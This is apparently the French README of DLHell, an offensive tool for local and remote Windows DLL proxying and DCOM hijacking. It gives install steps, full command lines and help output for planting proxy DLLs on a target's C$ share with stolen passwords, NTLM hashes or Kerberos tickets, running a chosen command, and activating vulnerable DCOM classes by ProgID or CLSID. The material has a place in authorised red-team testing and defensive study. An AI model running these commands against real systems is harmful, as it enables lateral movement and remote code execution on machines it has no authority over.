
Local & remote Windows DLL Proxying
DLHell effectue du proxying de DLL Windows DCOM local et distant.
Les paquets suivants sont requis (cela peut dépendre de votre distribution, l'exemple suivant est pour Debian 12) :
sudo apt install -y g++-mingw-w64-x86-64-win32 binutils-mingw-w64-x86-64
Installer les dépendances pip :
pip3 install -r requirements.txt
La commande suivante détourne la bibliothèque netutils.dll sur l'hôte 10.137.0.48 à partir du fichier modèle template.tpe (bibliothèque de détournement en source C++) qui lance calc.exe. Les DLL originale et proxy seront placées dans le dossier program files/windows nt/accessories/ du partage C$ sur la cible distante.
Veuillez utiliser la syntaxe Impacket pour l'option -remote-target.
DLHell.py -t template.tpe -c 'calc.exe' -remote-lib 'windows/system32/netutils.dll' -remote-target 'program files/windows nt/accessories/test.dll' -target 'domain/user:password@ip'
L'authentification Kerberos peut également être utilisée :
DLHell.py -t template.tpe -c 'calc.exe' -k -target wks-02.vault-tech.com -progid WordPad.Document.1
Listez les CLSID et ProgID disponibles :
DLHell.py -list
____ _ _ _ _ _
| _ \| | | | | | ___| | |
| | | | | | |_| |/ _ \ | |
| |_| | |___| _ | __/ | |
|____/|_____|_| |_|\___|_|_|
DLHell v1.0
usage: DLHell.py [-h] [-local-lib LOCAL_LIB] [-remote-lib REMOTE_LIB] [-local-target LOCAL_TARGET]
[-remote-target REMOTE_TARGET] [-target TARGET] [-clsid CLSID] [-progid PROGID] -t T -c C
[-u U] [-l] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]
[-target-ip ip address] [-port [destination port]]
DLL Hell - DLL Proxifier/Hijacker
options:
-h, --help show this help message and exit
-local-lib LOCAL_LIB Path of the remote library on the local system, ex: version.dll
-remote-lib REMOTE_LIB
Path of the library on the remote system, ex: windows/system32/version.dll. WARNING:
Will connect using SMB on C$ share. Admin rights needed. Requires -target
-local-target LOCAL_TARGET
The new name of the local output proxyfied library
-remote-target REMOTE_TARGET
The new name of the remote proxyfied library. WARNING: Will connect using SMB on C$
share. Admin rights needed. Requires -target
-target TARGET [[domain/]username[:password]@]<targetName or address>
-clsid CLSID CLSID of DCOM class to activate
-progid PROGID ProgID of DCOM class to activate
-t T, -template T Template file to use for lib generation
-c C, -command C Command to execute using hijacked lib
-u U, -user U Name of the user to hijack (used to put DLLs in localappdata folder)
-l, -list Lists vulnerable CLSID & ProgID for DCOM Hijacking
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on
target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN)
specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as
target. This is useful when target is the NetBIOS name and you cannot resolve it
-port [destination port]
Destination port to connect to SMB Server
Pour la création de DLL locale, utilisez les options -local-lib (nom de la DLL proxy) et -local-target (DLL d'origine renommée) :
DLHell.py -t template.tpe -c 'calc.exe' -local-lib 'lib/netutils.dll' -local-target 'test.dll'
Pour le détournement de DLL distant, spécifiez les options -target, -remote-lib (nom de la DLL d'origine sur l'hôte distant) et -local-target (DLL d'origine renommée) :
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -remote-lib 'windows/system32/PROPSYS.dll' -remote-target 'windows/test.dll'
Le proxying de DLL DCOM peut être exploité en utilisant les options -progid et -clsid.
La liste des CLSID et ProgID disponibles est accessible avec la commande suivante :
DLHell.py -list
Vous pouvez ajouter de nouveaux détournements au fichier dcom.json qui définit les chemins des bibliothèques vulnérables :
Ensuite, seul le ProgID ou le CLSID est requis pour :
Exemple pour le ProgID WordPad.Document.1 :
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -progid WordPad.Document.1
Exemple pour le CLSID 73FDDC80-AEA9-101A-98A7-00AA00374959 :
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -clsid 73FDDC80-AEA9-101A-98A7-00AA00374959